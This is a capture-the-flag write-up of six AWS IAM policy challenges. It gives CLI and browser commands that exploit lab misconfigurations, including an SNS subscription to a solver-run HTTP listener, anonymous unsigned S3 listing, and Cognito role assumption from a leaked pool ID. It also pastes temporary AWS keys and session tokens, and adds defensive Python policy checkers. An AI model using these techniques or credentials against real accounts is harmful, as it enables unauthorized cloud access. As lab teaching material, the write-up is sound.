WIZ The Big IAM Challenge

iam

2026-05-17

IAM is short for Identity and Access Management. It is a foundational service that cloud providers offer so users can securely control access to cloud resources. Put simply, it is the authorization system in front of every cloud resource, and it is also the logical boundary of the whole cloud architecture.

challenge 1

IAM policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}

Obviously, all that is needed is to list the files/ prefix and copy the flag out:

aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/flag

challenge 2

IAM policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}

The policy allows anyone ("*") to perform the two actions sqs:SendMessage and sqs:ReceiveMessage, and the resource is one specific Amazon Simple Queue Service (SQS) queue.

So anyone can send messages to and receive messages from this queue. Using the Account ID and the queue name from the challenge, build the queue URL in the form https://queue.amazonaws.com/<Account ID>/<Queue>:

aws sqs receive-message --queue-url https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
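Both resource policies so far grant actions to `Principal: "*"` with no condition that names a caller, which is exactly what makes the bucket and the queue reachable without any credentials. The Python checker below is an added example, not part of the original write-up or of the challenge itself: it copies the two policies from above and reports every Allow statement a wildcard principal can use with nothing narrowing who the caller is. The list of scoping condition keys is an illustrative assumption of this example, and keys placed under a ForAllValues operator are deliberately not counted as scoping, for the reason challenge 4 below shows.

```python
import json

# Resource policies copied from challenges 1 and 2 of the write-up; the checker
# itself is an added example and not part of the original post or the challenge.
BUCKET_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"},
    {"Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket",
     "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
     "Condition": {"StringLike": {"s3:prefix": "files/*"}}}
  ]
}""")

QUEUE_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Principal": "*",
     "Action": ["sqs:SendMessage", "sqs:ReceiveMessage"],
     "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"}
  ]
}""")

# Condition keys that tie a wildcard principal back to a known caller or source.
# Illustrative assumption of this example, not an exhaustive list.
SCOPING_KEYS = {"aws:PrincipalArn", "aws:PrincipalAccount", "aws:PrincipalOrgID",
                "aws:SourceArn", "aws:SourceAccount", "aws:SourceVpce"}


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _principals(principal):
    """Flatten "*" / {"AWS": "*"} / {"AWS": [...]} into a list of principal strings."""
    if isinstance(principal, str):
        return [principal]
    return [p for v in principal.values() for p in _as_list(v)]


def scoping_condition_keys(statement):
    """Condition keys in the statement that really narrow the caller. Keys under a
    ForAllValues operator are ignored on purpose: that operator is satisfied when
    the key is absent from the request, so it does not stop an anonymous caller."""
    keys = set()
    for operator, block in statement.get("Condition", {}).items():
        if operator.startswith("ForAllValues:"):
            continue
        keys.update(block)
    return keys & SCOPING_KEYS


def public_statements(policy):
    """Allow statements anyone on the internet can use: the principal is "*" and no
    condition narrows who the caller is. Returns (Sid or index, actions) pairs."""
    findings = []
    for i, st in enumerate(policy["Statement"]):
        if st.get("Effect") != "Allow" or "Principal" not in st:
            continue
        if "*" not in _principals(st["Principal"]):
            continue
        if scoping_condition_keys(st):
            continue
        findings.append((st.get("Sid", i), _as_list(st["Action"])))
    return findings


if __name__ == "__main__":
    for name, policy in (("bucket", BUCKET_POLICY), ("queue", QUEUE_POLICY)):
        for sid, actions in public_statements(policy):
            print(f"{name}: statement {sid} grants {', '.join(actions)} to anyone")
```

Run against the two policies, every statement is reported; adding, for example, a StringEquals condition on aws:PrincipalAccount to the queue policy makes the statement disappear from the findings, which is the shape a fixed policy should take.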

challenge 3

IAM policy

{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}

This is a resource-based policy; the protected resource is SNS (Simple Notification Service).

With this service, developers can push notifications to mobile devices, email, message queues and other endpoints, which makes it easy to deliver important information and real-time updates to users. Put simply, SNS is a message broadcast system that delivers messages to subscribers quickly and reliably so they receive your notifications promptly.

The policy allows users from any AWS account to subscribe to the specified SNS topic, but requires the subscriber's endpoint to end with @tbic.wiz.io (and the endpoint is not necessarily an email address).

So you can start an HTTP service (for example an nc listener) and give a subscription endpoint in the form http://x.x.x.x/@tbic.wiz.io, which gets around the *@tbic.wiz.io pattern restriction.

aws sns subscribe --topic-arn "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications" --protocol http --notification-endpoint "http://ip:port/@tbic.wiz.io"

Start the listener again and visit the confirmation link to confirm the subscription, then wait for the push.

challenge 4

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}

Admin only?

aws:PrincipalArn is meant to restrict listing objects under files/ to one specific IAM user, but it is written with ForAllValues:StringLike. For an unsigned anonymous request the aws:PrincipalArn key does not exist at all, and ForAllValues evaluates to true when the key is missing, so in practice anonymous users slip past the restriction and can list objects under the files/ prefix.

The --no-sign-request flag makes the CLI send the request unsigned, skipping the signing and authentication step, so it can be used for operations that do not require authentication.

aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix 'files/' --no-sign-request
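Challenges 3 and 4 both turn on how a Condition block is evaluated: a StringLike pattern that only constrains the tail of sns:Endpoint, and a ForAllValues operator that is satisfied when the request carries no aws:PrincipalArn at all. The Python below is an added example, not code from the write-up or from AWS: a small evaluator for the String operators used on this page, run against both conditions as written and against tightened versions. It evaluates only the Condition element (Principal, Action and Resource matching are out of scope), the request contexts are constructed, and the sns:Protocol fix is this example's suggestion (sns:Protocol is an SNS condition key for Subscribe).

```python
import re


def _glob(pattern, value):
    """IAM StringLike: '*' matches any run of characters and '?' one character;
    the comparison is case-sensitive."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c)
                    for c in pattern)
    return re.fullmatch(regex, value, re.DOTALL) is not None


def _match_any(operator, patterns, value):
    """Does one request value satisfy any of the policy's values for this key?"""
    if operator == "StringEquals":
        return value in patterns
    if operator == "StringLike":
        return any(_glob(p, value) for p in patterns)
    raise ValueError(f"operator not modelled here: {operator}")


def condition_allows(condition, context):
    """Evaluate a Condition block against the request context.

    context maps a condition key to the list of values the request carries; a
    missing key models a request that does not supply it, such as aws:PrincipalArn
    on an unsigned request. Operator blocks are ANDed and the values listed for one
    key are ORed, as in IAM. Only the String operators used on this page are modelled."""
    for op_spec, pairs in condition.items():
        set_op, _, operator = op_spec.rpartition(":")
        for key, patterns in pairs.items():
            patterns = patterns if isinstance(patterns, list) else [patterns]
            values = context.get(key, [])
            if set_op == "ForAllValues":
                # Set operator: every request value must match, and with no values
                # at all it is vacuously true. This lets the unsigned request in
                # challenge 4 through.
                ok = all(_match_any(operator, patterns, v) for v in values)
            elif set_op == "ForAnyValue":
                ok = any(_match_any(operator, patterns, v) for v in values)
            else:
                # Single-valued operator: a missing key makes the test fail.
                ok = bool(values) and any(_match_any(operator, patterns, v) for v in values)
            if not ok:
                return False
    return True


# Challenge 4: the condition as written, and the same scoping with a plain StringLike.
CH4_AS_WRITTEN = {
    "StringLike": {"s3:prefix": "files/*"},
    "ForAllValues:StringLike": {"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"},
}
CH4_FIXED = {
    "StringLike": {"s3:prefix": "files/*",
                   "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"},
}
# Request contexts (constructed): an unsigned --no-sign-request call carries no
# principal ARN at all; the other two are signed by different IAM users.
ANON = {"s3:prefix": ["files/"]}
ADMIN = {"s3:prefix": ["files/"], "aws:PrincipalArn": ["arn:aws:iam::133713371337:user/admin"]}
OTHER = {"s3:prefix": ["files/"], "aws:PrincipalArn": ["arn:aws:iam::133713371337:user/intern"]}

# Challenge 3: the endpoint pattern alone, and the same pattern pinned to the email
# protocol through sns:Protocol (the fix is this example's suggestion, not the page's).
CH3_AS_WRITTEN = {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io"}}
CH3_FIXED = {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io"},
             "StringEquals": {"sns:Protocol": "email"}}
HTTP_SUB = {"sns:Endpoint": ["http://203.0.113.10:8080/@tbic.wiz.io"], "sns:Protocol": ["http"]}
EMAIL_SUB = {"sns:Endpoint": ["alice@tbic.wiz.io"], "sns:Protocol": ["email"]}


if __name__ == "__main__":
    for label, cond, ctx in [
        ("ch4 as written, anonymous", CH4_AS_WRITTEN, ANON),
        ("ch4 as written, other user", CH4_AS_WRITTEN, OTHER),
        ("ch4 fixed, anonymous", CH4_FIXED, ANON),
        ("ch4 fixed, admin", CH4_FIXED, ADMIN),
        ("ch3 as written, http endpoint", CH3_AS_WRITTEN, HTTP_SUB),
        ("ch3 fixed, http endpoint", CH3_FIXED, HTTP_SUB),
        ("ch3 fixed, email endpoint", CH3_FIXED, EMAIL_SUB),
    ]:
        print(f"{label:32s} -> {'allow' if condition_allows(cond, ctx) else 'deny'}")
```

The two "as written" rows are the page's findings reproduced: the anonymous context passes the challenge 4 condition while a different signed user does not, and the HTTP endpoint passes the challenge 3 pattern. The "fixed" rows show that a single-valued StringLike closes the anonymous hole without locking out the admin user, and that pinning sns:Protocol keeps the email subscriber while rejecting the HTTP one.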

challenge 5

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}

This is an identity-based policy. To use AWS Cognito you first create an Amazon Cognito identity pool, then pass the identity pool ID to the SDK to obtain temporary credentials, and finally operate on the resources with those temporary credentials.

The image URL is as follows:

https://wiz-privatefiles.s3.amazonaws.com/cognito1.png?AWSAccessKeyId=ASIARK7LBOHXO5XNJRYL&Expires=1779016029&Signature=LNGfPxs6ZbhnB%2FSy%2BKauz6Sq0Ds%3D&x-amz-security-token=IQoJb3JpZ2luX2VjENv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIDp6rZ7dFtIjCjAJ%2FbU76oRcbF13xXD5py%2FE9WFa38xiAiBppaOTrpnwJyFaw2%2Bks%2FlHKK0caPw8yOHae5Yt8XvVfCq3BQij%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDA5MjI5Nzg1MTM3NCIM8c1qvw8EZy%2BmDXYGKosFKcZtEQnFULC%2F71on%2BDbpZrmyS5ZBc7IPIYHWY1xt7RUSenVOvce%2B0GtgRwkVgfb5v76raMk3GFouWu%2BmRKcQ%2FkFp4sFVN1SBGAA2LYAVFhW3VAupC7H873htmf9Dv%2BFMa7zikbXYHlHKlZkycKGb1w9EcXyLg4B7uvB0MIP3qHogMzkSwoDdHsZk1rukBfVoOc52f8pdv4NJxm9uSEYzmfv4mmGewMlZFey%2BDtTZGy9rkAgYzT5BvqsRkjASycbw3Dysbi6SFC3jR7nJdErdu0J4W78HeoIUXkK%2F9TrcSQyaphSPY9d1owtco2BbTRVASN5A1nSmFy3MdW8wEKc5z4DXbyDUJT3f6j3J7rovqSpiTElIsjTipqcnxobJQOxzJOa7Lo52O2Ak79Fv0MAJ37bfQBoe6jhLsIc8uBlJS0HdGfFFTTbhVpUKnp9uJV5BLSMGsjgAjR8KGKnD4JtugCRnOuFrofkYjyUMtOMhvZBQJUNj51w0st0FjV9jAOXs5Mr7XH8pVDTC42CnojV9qiQm924QYKrhEA%2F2%2FEcXS%2FFcGwtbr%2FJ%2B%2Bq%2FV0sE5PVzeQdYKCCnwFlYG7Oh5k4JEexFG6KNuUwm9zTGmo7AanMZSxdcwJoRiUYRTUMZrJIo02LXgc1mqCwIyJB9aykPKnWbabkeJFBXdzUkEz6%2BuFyKJoU5C5CYZdTOkSvTxZ6NCtWGCKooRnZfmYxdQtJtFA%2FXkv%2Bh3EJJpNML5KBEp5zoGfBuwNAjpvJlbuYfa%2BBtQayVlUvjE1A%2BQf221QD%2FUhGhjWkrLwRqY%2BoxH8PQT4WeFEsJQruae8h2j1FetYfUMxffoOpx4W6SvCdKUHRpSdnmMAAPrki69CIklMM2mptAGOt8CHzc7ciRiZ63hMeADyvipUhvY7hsjpQ9oU0nORvEbKGIdM%2BNlnEA5UEuo65BiZtciKD1hXGHn1%2B%2FFBM7lA4X4kZw%2FQ9lxrEiwqJmJBqYHKMlf5LsOcDvJepFhZEBiJ9vmRRo3AQ5h5ouLGPsIOf6ty%2BfRVr%2BIpqjbPRoiaxXctiusrcC1FO22ZCHUiB9wxji1nppdFrTzvbF3tsAubbctdh%2BMV0f3PHVjX5qusdo1qbgNMWL9n9p9RAPkgdwt%2BDuAfVEv2Ty10c%2F81UkqEan%2F3Xt8ESacdxApGm3VN%2FQcmlXfzbZoTTtPvj2WmxAisJACbjTEJmsQVudZCJDJJtnUX%2FIzeRt0Oxu%2BRQDn2qxDPwnccBd66A7DPvfyQugbsR1FrhzYAfbtgNFgZRgCcvpYAvAiMLwKH2%2BrslZ0H8u1jBhslUW7sCDU3XWixPh%2Bg0%2BboSeoeI3DZ1lPCi6nXlG%2F

The challenge exposes this information in its front-end requests; copy it out and make the calls from the browser console.
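A presigned URL like the one above carries an access key ID, an expiry and, for temporary credentials, a session token, so the first thing a defender wants from one found in front-end traffic is what it exposes and whether it is still live. The Python below is an added example, not from the write-up: it triages a constructed sample in the same shape as the leaked URL (AWS's documentation example key and a placeholder token) and also handles SigV4-style query parameters, which the page does not show.

```python
import time
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed sample with the same shape as the URL leaked above: the access key ID
# is AWS's documentation example key and the token is a placeholder, not real material.
SAMPLE_URL = (
    "https://wiz-privatefiles.s3.amazonaws.com/cognito1.png"
    "?AWSAccessKeyId=ASIAIOSFODNN7EXAMPLE&Expires=1779016029"
    "&Signature=LNGfPxs6ZbhnB%2FSy%2BKauz6Sq0Ds%3D&x-amz-security-token=PLACEHOLDER-TOKEN"
)


def credential_type(access_key_id):
    """AWS access key IDs are prefixed by kind: ASIA = temporary (STS) credentials,
    AKIA = long-term IAM user keys."""
    if access_key_id.startswith("ASIA"):
        return "temporary"
    if access_key_id.startswith("AKIA"):
        return "long-term"
    return "unknown"


def triage_presigned_url(url, now_epoch=None):
    """Summarise what a leaked presigned S3 URL exposes, handling both the query-string
    SigV2 form seen above (AWSAccessKeyId/Expires) and SigV4 (X-Amz-Credential/
    X-Amz-Date/X-Amz-Expires). now_epoch lets callers pin the clock for testing."""
    now_epoch = int(time.time()) if now_epoch is None else now_epoch
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    host = parts.netloc
    bucket = host.split(".s3")[0] if ".s3" in host else None  # virtual-hosted style
    if "AWSAccessKeyId" in q:  # SigV2 query authentication
        key_id = q["AWSAccessKeyId"]
        expires_epoch = int(q["Expires"])
    elif "X-Amz-Credential" in q:  # SigV4 query authentication
        key_id = q["X-Amz-Credential"].split("/")[0]
        signed_at = datetime.strptime(q["X-Amz-Date"], "%Y%m%dT%H%M%SZ").replace(tzinfo=timezone.utc)
        expires_epoch = int(signed_at.timestamp()) + int(q["X-Amz-Expires"])
    else:
        raise ValueError("not a presigned S3 URL")
    expires_at = datetime.fromtimestamp(expires_epoch, tz=timezone.utc)
    return {
        "bucket": bucket,
        "object_key": parts.path.lstrip("/"),
        "access_key_id": key_id,
        "credential_type": credential_type(key_id),
        "has_session_token": "x-amz-security-token" in q or "X-Amz-Security-Token" in q,
        "expires_at": expires_at.isoformat(),
        "seconds_remaining": expires_epoch - now_epoch,
        "expired": expires_epoch <= now_epoch,
    }


if __name__ == "__main__":
    for k, v in triage_presigned_url(SAMPLE_URL).items():
        print(f"{k:18s} {v}")
```

The expiry only bounds the URL, not the credentials behind it: the ASIA key and session token are valid until the STS session ends, and the role they belong to decides what else they can do, which is what the getSignedUrl calls below exploit.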

// AWS SDK for JavaScript v2, run from the browser console of the challenge page
AWS.config.region = 'us-east-1';
// Unauthenticated Cognito identity: only the leaked identity pool ID is needed
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
var s3 = new AWS.S3();
var params = {
  Bucket: 'wiz-privatefiles',
  Expires: 60 * 60   // URL validity in seconds
};
// Presigned URL for ListObjects on the bucket, printed to the console
s3.getSignedUrl('listObjects', params, function (err, url) {
  if (err) { console.error(err); return; }
  console.log(url);
});

Switch to getObject and run it again:

AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
var s3 = new AWS.S3();
var params = {
  Bucket: 'wiz-privatefiles',
  Key: 'flag1.txt',
  Expires: 60 * 60   // URL validity in seconds
};
// Presigned URL for GetObject on flag1.txt
s3.getSignedUrl('getObject', params, function (err, url) {
  if (err) { console.error(err); return; }
  console.log(url);
});

challenge 6

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

This came up in earlier challenges as well: STS temporary credentials. Use the AWS CLI to get an identity ID and a web-identity token.

First get the identity ID, then get the web-identity token:

# get-id takes the identity pool ID (the one leaked in challenge 5) and returns an IdentityId
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
# exchange that IdentityId for an OpenID token
aws cognito-identity get-open-id-token --identity-id us-east-***

Note: strip the line breaks out of the token here.

aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role \
  --role-session-name aniale \
  --web-identity-token eyJraWQiOiJ1cy

Then configure the CLI with the temporary access key and secret key; for some reason export would not take, so pass them inline with the command:

AWS_ACCESS_KEY_ID="ASIARK7LBOHXDY26UMDL" AWS_SECRET_ACCESS_KEY="3NBHjvSfuCQ87bx97yoyWcQlo0uDdpefSMJYBwUt" AWS_SESSION_TOKEN="FwoGZXIvYXdz
EO7//////////wEaDAetIKanRGXX/ehjQiKmAtDRXrsTcnm1+/cHC+pwxL0Z5eB2Thm3/jgIbzDKcLitsv0fBu3x5tMDZXPNs/htJ7jMh/IREaGM/FuAYiTYDjAeS2gwcC+owaQ1Ju/
+i4tFTQXafMuobiYZVq/DCuKBf/QpW96i3T4F/C11KFpQApiVq7kTdAmUg0tK+WJ7It1/D0fS25CluRueWazuZUPaW5pCbUJJN909NyIAx0Trlh6NSOtO88wrJeUyV9u4LhGzQ7dm5e
O4M+8WdidbqIzX0c2jbZqfRZ+Wbb1vwjWrSbjk5yP+3NFKdaQxmQpLergiSNEaG5ngjk7vKVD0Im+xLevl8vAVuhXWhd+U24U2j6bgUJ0e5FI+MkArc/IuZtmvvEFzo+54S0M0RUOyt
30GpeeW0gYwWCjj36bQBjKUAVd6pVMYRwxg4Ce7rElzj9JTBKuNE6I6PLNrXwrgLhvgmEjpggIc8CswJoyHWjB9mkWFOR0a/OVJxgdXuVpGmVjvzVn4VZ2AszIG3h1g3Pok1W7ufWDY
z7b1ngApEkCDyqNBOtcYAm+TBEUJQmUQeMAuN/nmY45UDAMfeur8UwZEodVqCowW726XSAhcqCfmy0cGHpc=" aws s3 ls
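The trust policy in challenge 6 checks only the aud claim (the identity pool ID), so any identity that pool issues, including the unauthenticated one obtained above with get-id, can assume the role. The trust policy AWS generates for an identity pool's authenticated role additionally requires the amr claim to contain "authenticated". The Python below is an added example, not from the write-up: it copies the challenge 6 trust policy, builds a hardened copy with that amr condition, and audits both with a small checker whose finding texts are this example's own.

```python
import json

# Trust policy copied from challenge 6 above. The audit function is an added example
# (not from the write-up); the amr check follows the trust policy AWS generates for a
# Cognito identity pool's authenticated role.
CHALLENGE6_TRUST = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {"Federated": "cognito-identity.amazonaws.com"},
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
        }
      }
    }
  ]
}""")

# The same statement with the amr condition that limits it to authenticated identities.
HARDENED_TRUST = json.loads(json.dumps(CHALLENGE6_TRUST))
HARDENED_TRUST["Statement"][0]["Condition"]["ForAnyValue:StringLike"] = {
    "cognito-identity.amazonaws.com:amr": "authenticated"
}

AUD = "cognito-identity.amazonaws.com:aud"
AMR = "cognito-identity.amazonaws.com:amr"


def _as_list(v):
    return v if isinstance(v, list) else [v]


def audit_cognito_trust(policy):
    """Findings, as (Sid or index, message) pairs, for each Allow statement that lets
    Cognito Identity assume the role."""
    findings = []
    for i, st in enumerate(policy["Statement"]):
        if st.get("Effect") != "Allow":
            continue
        if "sts:AssumeRoleWithWebIdentity" not in _as_list(st.get("Action", [])):
            continue
        principal = st.get("Principal", {})
        if not isinstance(principal, dict) or principal.get("Federated") != "cognito-identity.amazonaws.com":
            continue
        sid = st.get("Sid", i)
        # Flatten {operator: {key: value}} into key -> values; the operator is not needed here.
        keys = {}
        for block in st.get("Condition", {}).values():
            for key, val in block.items():
                keys.setdefault(key, []).extend(_as_list(val))
        if AUD not in keys:
            findings.append((sid, "no aud condition: tokens from any identity pool are accepted"))
        if AMR not in keys:
            findings.append((sid, "no amr condition: unauthenticated (guest) identities can assume this role"))
        elif "unauthenticated" in keys[AMR]:
            findings.append((sid, "amr explicitly admits unauthenticated identities"))
    return findings


if __name__ == "__main__":
    for name, policy in (("challenge 6", CHALLENGE6_TRUST), ("hardened", HARDENED_TRUST)):
        print(name, audit_cognito_trust(policy) or "no findings")
```

The hardened copy still accepts the pool's authenticated users, so the application keeps working; what changes is that an OpenID token minted for a guest identity no longer satisfies the trust policy, which closes the path taken in this challenge.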
